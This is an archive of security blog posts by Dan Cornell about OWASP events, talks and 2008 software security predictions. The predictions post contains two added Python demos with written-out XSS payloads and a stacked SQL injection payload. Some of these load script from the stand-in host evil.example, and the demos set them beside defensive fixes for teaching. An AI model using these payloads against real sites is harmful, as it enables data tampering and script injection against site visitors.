November 05, 2008

OWASP EU Summit in Portugal: Monday

By Dan Cornell


This week I'm in Portugal at the OWASP EU Summit '08.

Just after I arrived on Monday I had the opportunity to talk about AJAX security and sprajax to a group of students at the one-day OWASP event at the University of Algarve.  The slide deck was a shortened version of the one from when I presented at OWASP Montgomery.  I always enjoy speaking to University students because you have to work hard to frame the material in the appropriate context.  For example - how do you explain SQL injection to someone who has never written a database application?  How do you explain PCI compliance to someone who has never worked inside an enterprise that takes credit cards?

I finally got some sleep Monday night after a day and a half of flights, airport wait time, presentations to University students and the conference kickoff.  This is shaping up to be a great event.  More to come.

--Dan
dan _at_ denimgroup.com

January 11, 2008

Top 5 Software Security Predictions for 2008

By Dan Cornell

Lolguana

Top 5 Software Security Predictions for 2008

1. More Software Security Vendor Acquisitions

As the industry matures there will be more consolidation.  As larger mainstream vendors buy up software security companies, software security tools will get wider distribution, but that will not necessarily translate into deeper adoption: adoption up until now has been driven largely by independent vendor evangelism.

2. Cross Site Scripting is the New Buffer Overflow

Buffer overflows used to be the way attackers ran arbitrary code on servers, where the valuable data lived.  Now that most new server-side applications are written on managed platforms such as .NET and Java, buffer overflows are on the decline (see the changes between the OWASP Top 10 2004 and Top 10 2007).  With Web 2.0 and other trends moving more data onto the client side, hosted in browsers, the ability to run malicious code in a client's browser (XSS) will become paramount for attackers.  Also, cross site scripting as a class of problem encompasses many subtle variations that will persist even when the obvious XSS flaws have been addressed - just as we saw with buffer overflows as attackers moved from stack overflows to heap overflows to format string attacks.
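To make those "subtle variations" concrete, here is an added Python example (mine, not code from the original post): a blacklist filter that strips `<script>` tags, the payloads that still execute in attribute and URL contexts, and a rendering that instead encodes per context and allow-lists URL schemes.  The payloads, the profile-page template and the `ScriptSink` checker are constructed for this illustration; the checker parses the rendered markup the way a browser would and reports anything that would run script.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed payloads for this illustration; each is used as both a display
# name (HTML text and attribute context) and a profile link (URL context).
PAYLOADS = [
    '<script>alert(1)</script>',                    # the obvious case
    '<SCRIPT SRC=//evil.example/x.js></SCRIPT>',    # case variation, external script
    '<img src=x onerror=alert(1)>',                 # no <script> tag at all
    '" autofocus onfocus=alert(1) x="',             # breaks out of a quoted attribute
    'javascript:alert(1)',                          # only dangerous as a URL
]

SCRIPT_TAG = re.compile(r'</?script[^>]*>', re.IGNORECASE)


def naive_filter(value: str) -> str:
    """The 'obvious flaw' fix: strip <script> tags and nothing else."""
    return SCRIPT_TAG.sub('', value)


def safe_url(url: str) -> str:
    """Encoding cannot neutralise javascript: URLs; allow-list the scheme instead."""
    if urlparse(url.strip()).scheme in ('http', 'https'):
        return html.escape(url, quote=True)
    return '#'


def render_with_blacklist(name: str, url: str) -> str:
    """Hypothetical profile snippet rendered with the blacklist only."""
    n = naive_filter(name)
    return (f'<p>Hello {n}</p>'
            f'<input value="{n}">'
            f'<a href="{naive_filter(url)}">profile</a>')


def render_with_encoding(name: str, url: str) -> str:
    """Same snippet, encoded per context: text, quoted attribute, URL."""
    return (f'<p>Hello {html.escape(name, quote=False)}</p>'
            f'<input value="{html.escape(name, quote=True)}">'
            f'<a href="{safe_url(url)}">profile</a>')


class ScriptSink(HTMLParser):
    """Parses rendered markup as a browser would and records anything that
    executes script: <script> elements, on* handlers, javascript: URLs."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == 'script':
            self.findings.append('<script> element')
        for name, value in attrs:
            if name.startswith('on'):
                self.findings.append(f'<{tag} {name}=...> handler')
            elif name in ('href', 'src') and (value or '').strip().lower().startswith('javascript:'):
                self.findings.append(f'<{tag} {name}="javascript:..."> URL')


def executes_script(markup: str) -> list[str]:
    sink = ScriptSink()
    sink.feed(markup)
    sink.close()
    return sink.findings


def evaluate(render) -> dict:
    """Map each payload to the executable constructs that survive a renderer."""
    return {p: executes_script(render(p, p)) for p in PAYLOADS}


if __name__ == '__main__':
    for label, render in (('blacklist', render_with_blacklist), ('encoding', render_with_encoding)):
        for payload, findings in evaluate(render).items():
            print(f'{label:9} {payload!r:45} -> {findings or "safe"}')
```

The blacklist stops both `<script>` variants and nothing else; the three remaining payloads are exactly the "subtle variations" that outlive the obvious fix.  Note that the encoded version still needs `safe_url`: HTML encoding leaves `javascript:alert(1)` untouched, so the URL context needs its own rule.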

3. More Combined Attacks on the Horizon

General awareness of software security issues has improved in recent years.  Most developers these days have at least heard of SQL injection, and tool adoption by large organizations has started to stem the tide of SQL injection and other simple vulnerabilities in high-profile and critical applications.  As these individual pieces become more secure, attackers will look for more subtle attacks that combine different attack vectors such as SQL injection and Cross Site Scripting (XSS).  The recent mass SQL injection attack that injected malicious HTML and JavaScript into databases - so that the stored script was served to every visitor of the affected pages - is a good example and a harbinger of things to come.  Also, using Cross Site Request Forgery (CSRF) to weave attacks across separate applications will continue to gain steam.  As the components mature, more vulnerabilities will come from the interactions between them.
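The chain that mass-injection attack used is easy to reproduce in miniature.  The following added Python example (mine, not code from the original post or from the incident) uses an in-memory SQLite database: a page-view counter that concatenates the request's `id` parameter into SQL lets a single request append a script tag to every product description, and a product page that trusts the database then serves that script to every later visitor.  The hardened pair binds the parameter and encodes on output, so each half of the combined attack is blocked independently.  The catalog table, sample rows and payload are constructed for this illustration.

```python
import html
import sqlite3

# Constructed catalog rows for this illustration.
SAMPLE_ROWS = [('Widget', 'A fine widget'), ('Gadget', 'A fine gadget')]

# Constructed payload modelled on the mass-injection pattern: the request's
# numeric 'id' parameter is hijacked to append a script reference to every
# text column, so the script is served to every later visitor.
INJECTED_SCRIPT = '<script src="http://evil.example/x.js"></script>'
PAYLOAD = f"1;UPDATE products SET description = description || '{INJECTED_SCRIPT}';--"


def open_catalog() -> sqlite3.Connection:
    con = sqlite3.connect(':memory:')
    con.execute('CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, '
                'description TEXT, views INTEGER NOT NULL DEFAULT 0)')
    con.executemany('INSERT INTO products (name, description) VALUES (?, ?)', SAMPLE_ROWS)
    con.commit()
    return con


def record_view_vulnerable(con: sqlite3.Connection, product_id: str) -> None:
    """Concatenates the parameter into SQL; executescript stands in for a
    database driver that accepts stacked statements."""
    con.executescript(f"UPDATE products SET views = views + 1 WHERE id = {product_id}")


def record_view_safe(con: sqlite3.Connection, product_id: str) -> None:
    """Parameterized: the value is bound as data and never parsed as SQL."""
    con.execute("UPDATE products SET views = views + 1 WHERE id = ?", (product_id,))


def fetch(con: sqlite3.Connection, product_id: int):
    return con.execute("SELECT name, description FROM products WHERE id = ?",
                       (product_id,)).fetchone()


def render_vulnerable(con: sqlite3.Connection, product_id: int) -> str:
    """Trusts the database: whatever was stored is emitted as markup."""
    name, description = fetch(con, product_id)
    return f"<h1>{name}</h1><p>{description}</p>"


def render_safe(con: sqlite3.Connection, product_id: int) -> str:
    """Encodes on output, so a poisoned row renders as text instead of running."""
    name, description = fetch(con, product_id)
    return f"<h1>{html.escape(name)}</h1><p>{html.escape(description)}</p>"


def poisoned_rows(con: sqlite3.Connection) -> int:
    return con.execute("SELECT count(*) FROM products WHERE description LIKE '%<script%'").fetchone()[0]


def page_executes_script(markup: str) -> bool:
    return '<script' in markup.lower()


def demo() -> dict:
    results = {}
    con = open_catalog()
    record_view_vulnerable(con, PAYLOAD)                      # injection lands in the DB...
    results['rows_poisoned_vulnerable'] = poisoned_rows(con)  # ...in every row, not just id 1
    results['vulnerable_page_runs_script'] = page_executes_script(render_vulnerable(con, 2))
    results['encoded_page_runs_script'] = page_executes_script(render_safe(con, 2))

    con = open_catalog()
    record_view_safe(con, PAYLOAD)                            # bound as a string: matches no id
    record_view_safe(con, '2')                                # legitimate use still works
    results['rows_poisoned_safe'] = poisoned_rows(con)
    results['views_after_safe_lookup'] = con.execute(
        "SELECT views FROM products WHERE id = 2").fetchone()[0]
    return results


if __name__ == '__main__':
    for key, value in demo().items():
        print(f'{key}: {value}')
```

The point of running both fixes is that they are not redundant: parameterization keeps the script out of the database, and output encoding means that a row poisoned by some other path (a bulk import, an admin tool, a different application sharing the database) still does not execute in the visitor's browser.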

4. Academia Will Start to Get In On the Act

Up to this point there has been comparatively limited work done in academia that was specifically focused on software security.  In 2008 I suspect several prominent institutions will announce software security-specific efforts.  This is great because it will hopefully start the long road toward security being taught throughout the computer science curriculum rather than as specialized add-on coursework.

5. Social Networking is Going to Have a Rough Year

With so many people becoming involved in multiple Social Networking sites, so much valuable personal data being stored in those sites and with increased programmability being made available, vulnerabilities will skyrocket as threats and countermeasures in this environment are not well understood.

2007 was a tremendously exciting year for application security and I think 2008 is going to blow it away.  Tremendous strides have been made in education, testing and countermeasures but equal if not more progress has been made by attackers as they evolve their methods and - even more importantly - their goals.

--Dan

PS - Picture is another I took in Costa Rica.  It has been LOLGuana-ed up solely to aggravate Sheridan Chambers, who hates LOLCats more than anyone I know.  Even I'm getting annoyed so I guess I ought to lay off for a while.

November 15, 2007

OWASP AppSec 2007 San Jose: Day 1

By Dan Cornell


As mentioned before, John Dickson and I are up at the OWASP AppSec 2007 San Jose conference this week.  I had a chance to attend some great sessions and talk with a bunch of great folks today.  Here are some notes:

  • The keynote speakers were Dave Cullinane and Michael Barrett from eBay and PayPal.  Michael had to run off to catch a plane, but Dave gave a great overview of the scale of the problem eBay faces trying to build a trusted platform for commerce.
  • Chris Wysopal's talk about finding backdoors in software was fantastic.  It had some great analysis of backdoors discovered in software in the past and great discussion of possible signatures for static analysis tools that can help identify potential backdoors.  It is hard enough to find security vulnerabilities introduced into software accidentally - looking for backdoors intentionally crafted and inserted is just that much harder.
  • Eric Sheridan's talk about Cross Site Request Forgery was very informative and I am looking forward to trying out his two new CSRF tools.
  • I caught up with IBM Watchfire's Ory Segal. He gave me a demo of some of the new AppScan 7.7 features.  I have been slacking off but I finally got a copy of the beta and will be looking at it through the end of this week.  So far it looks to be pretty impressive.  I'm looking forward to the new "state inducer" feature that allows you to record more complicated workflows to get an application into a state where you can actually test it.  Think of an application with a three step process - you need to go through steps one and two before you can test the functionality at step three.  This has been a problem with scanners we have used in the past when we are testing more complicated web applications implementing multi-step processes.
  • Amichai Shulman's talk about defeating Web 2.0 vulnerabilities was basically a web application firewall commercial - but I suppose that is to be expected.  He did have an excellent point that given the number of CSRF vulnerabilities that exist in existing code it is a daunting task to try to eliminate them all in code.  From that standpoint WAFs certainly do have a place in any serious application security infrastructure.
  • I caught the tail-end of Robert "RSnake" Hansen's talk about browser insecurities.  OWASP is launching a Working Group to deal with browser insecurity issues and I look forward to seeing what they come up with.
  • The "Building an Effective Application Security Assurance Program" panel did a good job of laying out what does and does not work when creating such programs.  Hint: don't pick a tool and think that your problems are solved.
  • The OWASP Leaders meeting was a good chance to put some names with faces.  It also made me realize that the Texas chapters - San Antonio, Austin, Houston - need to do a better job of attending the OWASP national conferences.
  • As always the OWASP Dinner was a great chance to relax after a day packed with great information.

So that is a wrap up of Day 1.  More info to come on Day 2.

--Dan
dan _at_ denimgroup.com

August 23, 2007

OWASP Montgomery "Web 2.0 and AJAX Security" Slide Deck Online

By Dan Cornell

The slide deck from my "Web 2.0 and AJAX Security" talk at OWASP Montgomery is up online here.  Thanks to everyone who attended.

We had some great discussions about SOA security and how mandates to be SOA-enabled by a certain date often force organizations to deploy solutions and technologies they don't really understand.  Obviously this has a negative impact on the security of these systems.

--Dan
dan _at_ denimgroup.com

August 20, 2007

Web 2.0 Security Talk At OWASP Montgomery Tomorrow

By Dan Cornell

I will be speaking at the OWASP Montgomery meeting tomorrow (Tuesday August 21st) at the Auburn University Taylor Center.  The topic is Web 2.0 and AJAX security.

--Dan
dan _at_ denimgroup.com

June 12, 2007

AJAX on Your Apple iPhone: "Secure" Development Indeed

By Dan Cornell

It looks like the folks at Apple are pretty excited about the Safari browser that will be loaded with the iPhone.  Steve Jobs has apparently promoted the browser capabilities as a way to do development for the iPhone while still keeping it "secure".  Given how completely broken the initial release of Safari was for Windows, I am not sure this will accomplish the task.

Thanks to Alan Weinkrantz for letting me know about the AJAX plans for iPhone.

--Dan
dan _at_ denimgroup.com

June 06, 2007

OWASP Houston Slide Deck on Web 2.0 Security Online

By Dan Cornell

The slide deck from the presentation I made yesterday to the inaugural OWASP Houston meeting is up online.  We had a great turnout and some great questions.  Thanks to all who attended.  Also thanks to the meeting sponsors: Microsoft (who provided the facility), Set Solutions and SPI Dynamics.

I also wanted to point interested folks to the OWASP resources I mentioned at the end of the presentation:

Again thanks to everyone for coming out and I hope to see you folks at future OWASP events.  Please keep an eye on the OWASP Houston page for news on upcoming events.

--Dan
dan _at_ denimgroup.com

June 01, 2007

Google Gears and Security

By Dan Cornell

Google has announced their Google Gears tools for making online/offline web applications.  This is a great idea and I am looking forward to looking into it further.

I was kind of surprised to see that it has to run native code on the local machine.  This isn't a terrible idea - it gives you a lot more capabilities and features.  I had been hoping for a fully browser-based JavaScript datastore with online synchronization capabilities.  Something that would run without any special plugins.  This would be more limited because the browser would have to be back on the network before being closed if you wanted to persist any of the changes that had been made when offline.  Instead they are using a local copy of SQLite along with some other native code/browser plugin stuff.

From a features standpoint that allows you to make much more interesting applications.  Maintaining local-disk state that lives across browser lifetimes is super-helpful.  From a security standpoint, however, this opens up a whole can of worms.  If this framework is going to require a user to run local code attackers are not just limited to breaking current browser security protections.  They can also attack the local code that Google Gears will rely on.  This is a huge difference so we will see how things turn out.

However I was encouraged to see that they have a fledgling security page that talks about design and coding issues that could affect Google Gears applications' security.  They have a little bit of talk about their security model and a little bit of talk about things like SQL injection.  This is a good start but with such a new mentality for building web applications and so much new code in the frameworks I suspect that there will be more than a few security issues to work out - both in the framework and in the application built on top of it.

Fun stuff!

--Dan
dan _at_ denimgroup.com

May 15, 2007

Speaking at ComTech IT Conference and Expo

I will be speaking next Wednesday May 23rd at the ComTech IT Conference and Expo in New Orleans, LA.  The topic is "Security Dangers in Web Application Development – SQL Injection, AJAX, XSS"

I have not yet been back to New Orleans post-Katrina so I am curious to see how the city is doing these days.  If anyone is going to be there let me know and hopefully we can catch up.

--Dan
dan _at_ denimgroup.com

May 10, 2007

Unatek Web Services Security Conference Slide Decks Online

By Dan Cornell

The slide deck from my talk at the Unatek Web Services Security Conference on Web 2.0 Security is up online on the Denim Group presentations page.  They had their own template for the slides, but I think I like the standard Denim Group version better.

--Dan
dan _at_ denimgroup.com